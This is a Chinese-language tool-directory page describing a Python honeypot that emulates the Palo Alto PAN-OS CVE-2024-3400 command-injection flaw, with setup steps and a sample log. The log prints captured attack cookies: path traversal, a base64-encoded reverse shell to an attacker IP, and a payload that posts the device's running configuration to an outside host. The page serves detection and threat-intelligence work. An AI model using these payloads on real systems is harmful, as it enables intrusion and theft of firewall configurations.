Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-3400-pot — 针对 CVE-2024-3400 Palo Alto PAN-OS 命令注入漏洞的简单蜜罐 | Kitploit
工具/GitHubGitHub/zam89/cve-2024-3400-pot
防御工具Web安全威胁情报入侵检测事件响应
GitHubzam89/cve-2024-3400-pot

CVE-2024-3400-pot

针对 CVE-2024-3400 Palo Alto PAN-OS 命令注入漏洞的简单蜜罐

查看仓库
612年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-3400-pot

针对CVE-2024-3400 Palo Alto PAN-OS命令注入漏洞的简单蜜罐。

特性

  • 模拟访问 /global-protect/login.esp(GlobalProtect 门户登录页面)
  • 模拟 HTTP 请求 POST /ssl-vpn/hipreport.esp 和 Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;
  • 从 cookie 中提取文件名(如果存在)
  • 将 POST 请求的内容保存到文件中
  • 模拟用户请求 GET /global-protect/portal/images/<file> 时,用户会收到 403 而非 404
  • 收集请求的 IP 和 User-Agent

前提条件

  • 服务器上已安装 Python 3.x。

  • Python PIP

    • pip install flask
  • 使用 OpenSSL 生成自签名证书和私钥:

    root@kitploit:~
    $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
      
      Enter PEM pass phrase:
      Verifying - Enter PEM pass phrase:
      -----
      You are about to be asked to enter information that will be incorporated
      into your certificate request.
      What you are about to enter is what is called a Distinguished Name or a DN.
      There are quite a few fields but you can leave some blank
      For some fields there will be a default value,
      If you enter '.', the field will be left blank.
      -----
      Country Name (2 letter code) [XX]:XX
      State or Province Name (full name) []:XX
      Locality Name (eg, city) [Default City]:
      Organization Name (eg, company) [Default Company Ltd]:XX
      Organizational Unit Name (eg, section) []:XX
      Common Name (eg, your name or your server's hostname) []:XX
      Email Address []:XX
    
    • 从私钥中移除口令:
    root@kitploit:~
    $ openssl rsa -in key.pem -out key1.pem
    Enter pass phrase for key.pem:
    writing RSA key
    
    $ mv key1.pem key.pem
    

使用方法

启动蜜罐,运行以下命令:

root@kitploit:~
sudo nohup python3 CVE-2024-3400-pot.py &
disown
  • 检查脚本是否在运行:
root@kitploit:~
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1208/python3

sudo ps aux | grep <PID>
sonic        1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py

示例日志

root@kitploit:~
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -

下载工具